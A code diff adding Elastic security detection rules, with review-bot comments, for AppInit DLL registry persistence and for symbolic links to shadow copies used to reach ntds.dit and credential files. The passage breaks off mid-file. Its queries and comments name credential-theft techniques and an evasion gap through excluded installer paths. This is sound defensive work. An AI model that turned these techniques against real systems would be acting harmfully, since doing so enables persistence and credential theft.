@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppInit DLL", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\Display.NvContainer\\\\NVDisplay.Container.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\NVIDIA Corporation\\\\Display.NvContainer\\\\NVDisplay.Container.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"d0e159cf-73e9-40d1-a9ed-077e3158a855", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.010", + "name": "AppInit DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/010/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d0e159cf-73e9-40d1-a9ed-077e3158a855_109", + "type": "security-rule" +} \ No newline at end of file 
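Review bot: The `process.executable` exclusions for `?:\\Windows\\System32\\msiexec.exe` and `?:\\Windows\\SysWOW64\\msiexec.exe` silence any AppInit_Dlls write that goes through Windows Installer, legitimate or not, so the rule's own "unlikely to happen legitimately" false-positive text no longer describes what it actually alerts on; if the exclusion is needed for noise, scoping it by `process.parent.executable` or recording the accepted gap in `note` would be preferable to the bare executable name. The query also watches only the `AppInit_Dlls` values; the sibling `LoadAppInit_DLLs` value under the same keys toggles the mechanism, and if the registry data source exposes it, adding it to `registry.path` closes an obvious blind spot. The same query is repeated in the _110 snapshot that follows, so any change applies to both.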
diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_110.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_110.json new file mode 100644 index 00000000000..ef42a43c9df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_110.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppInit DLL", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\Display.NvContainer\\\\NVDisplay.Container.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\NVIDIA Corporation\\\\Display.NvContainer\\\\NVDisplay.Container.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"d0e159cf-73e9-40d1-a9ed-077e3158a855", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.010", + "name": "AppInit DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/010/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d0e159cf-73e9-40d1-a9ed-077e3158a855_110", + "type": "security-rule" +} \ No newline at end of file 
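Review bot: The `not process.executable : (...)` clause in the query is a path-only allowlist, so a binary launched from one of those paths suppresses the alert regardless of who signed it, and writing `AppInit_Dlls` under HKLM already implies the administrative rights needed to drop a file into the Commvault or NVIDIA locations or to run an attacker-supplied MSI through the excluded `msiexec.exe`. Since Elastic Defend registry events carry signer data and a sibling rule in this commit already uses the optional-field syntax (`?process.pe.original_file_name`), tying the exclusion to a trusted signature is cheap: `not (process.executable : (...) and ?process.code_signature.trusted == true)`, with `process.code_signature.trusted` added to `required_fields`. Be aware that on sources without signer fields (Sysmon, winlogbeat) the exclusion would then stop applying, so the change needs testing against that data; excluding `msiexec.exe` at all is questionable given an MSI is a legitimately signed vehicle for setting this value. If these JSON files are generated from the detection-rules sources, the fix belongs in the source rule rather than in this artifact.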
diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_110.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_110.json new file mode 100644 index 00000000000..c70dda89585 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_110.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials.", + "false_positives": [ + "Legitimate administrative activity related to shadow copies." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Symbolic Link to Shadow Copy Created", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (?process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\")) or\n (process.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", + "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", + "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", + "https://www.hackingarticles.in/credential-dumping-ntds-dit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "## Setup\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 
4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_111.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_111.json new file mode 100644 index 00000000000..5a047b8273a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_111.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials.", + "false_positives": [ + "Legitimate administrative activity related to shadow copies." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Symbolic Link to Shadow Copy Created", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (?process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\")) or\n (process.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", + "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", + "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", + "https://www.hackingarticles.in/credential-dumping-ntds-dit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "## Setup\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 
4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: 